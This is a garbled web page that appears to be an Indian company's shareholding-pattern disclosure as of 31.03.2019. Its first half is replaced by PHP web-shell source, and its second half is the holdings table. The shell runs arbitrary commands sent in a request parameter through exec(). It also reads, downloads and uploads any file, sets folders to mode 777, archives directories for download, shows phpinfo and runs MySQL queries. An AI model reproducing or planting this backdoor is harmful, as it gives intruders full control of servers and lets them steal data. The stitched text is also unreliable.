As on: 31.03.2019
$val)//Process .. directories and a single .
{
if($val=="..")
{
$parts[$key]="";
$lastKey=$key-1;
$parts[$lastKey]="";
}
elseif($val==".")
{
$parts[$key]="";
}
}
reset($parts);
$fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it
$firstPiece=true;
foreach($parts as $val)//Assemble the path back together
{
if($val != "")
{
$fixedPath .= ($firstPiece ? '' : $slash) . $val;
$firstPiece=false;
}
}
if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error
{
$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
}
//Make sure there is an ending slash
if(substr($fixedPath,-1)!=$slash)
$fixedPath .= $slash;
return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign");
}
}
elseif(isset($_REQUEST['phpinfo']))
{
phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true)
{
$_REQUEST['dl'] .= $_REQUEST['file'];
if(substr($_REQUEST['dl'],0,1)==$slash)
$fileArr=explode($slash,$_REQUEST['dl']);
header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
header('Content-type: application/octet-stream');
readfile($_REQUEST['dl']);
}
else
{
echo $_REQUEST['dl'];
}
}
elseif(isset($_REQUEST["gz"]))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
$directory=$_REQUEST["gz"];
if(substr($directory,-1)=="/")
$directory = substr($directory,0,-1);
$dirParts=explode($slash,$directory);
$fname=$dirParts[(sizeof($dirParts)-1)];
$archive = time();
exec( "cd $directory; tar czf $archive *");
$output=@file_get_contents($directory . "/" . $archive);
if(!$output)
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
else
{
header("Content-disposition: attachment; filename=$fname.tgz");
echo $output;
}
header('Content-type: application/octet-stream');
@unlink($directory . "/" . $archive);
}
}
elseif(isset($_REQUEST['f']))
{
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
header("Content-Type: text/plain");
fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
$d=$_REQUEST['d'];
echo ""; if ($handle = opendir("$d")) { echo "listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)
(gzip & download folder) (chmod folder to 777) (these rarely work)
"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "
"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '' . htmlentities($val) . ''; } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>
The following query has sucessfully executed" . htmlentities($mquery) . "
"; echo "Return Results:
"; $first=true; echo "
$key | "; } echo "
$val | "; } echo "
Operating System:
PHP Version:
View phpinfo
Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:
Execute MySQL Query:
Category
|
No. of Shares held | Percentage of shareholding | |||||
A
|
Promoter’s holding |
1 |
Promoter’s |
1.1
|
Indian Promoters
|
25,03,257 |
50.06
|
1.2 |
Foreign Promoters
|
-- | -- | ||||
2 |
Persons acting in concert
|
-- | -- | ||||
3 |
Sub Total (1.1 + 1.2)
|
25,03,257 | 50.06 | ||||
B
|
Non- Promoter’s holding |
4 |
Institutional
Investors |
4.1 |
Mutual Funds and UTI
|
-- | -- |
4.2 |
Banks, FinancialInstitutions, Insurance Companies (Central/State Govt.Institutions / Non- Govt. Institutions)
|
-- | -- | ||||
4.3 |
FIIS
|
-- | -- | ||||
4.4 |
Sub Total (4.1 to 4.3)
|
-- | -- | ||||
5 |
Others
|
5.1 |
Private Corporate Bodies
|
1,27,272 | 2.55 | ||
5.2 |
Indian Public
|
20,98,977 | 41.98 | ||||
5.3 |
NRI/OBCs
|
1,51,157 | 3.02 | ||||
5.4 |
HUF
|
1,10,072 | 2.20 | ||||
5.5 |
Trust & Foundations
|
-- | -- | ||||
5.6 |
Any other (Please specify) Govt. (IEPF)
|
9,265 | 0.19 | ||||
5.7 |
Sub Total (5.1 to 5.6)
|
24,96,743 | 49.94 | ||||
C
|
GRAND TOTAL (A3 + B4.4 + B5.7) | 50,00,000 | 100.00 |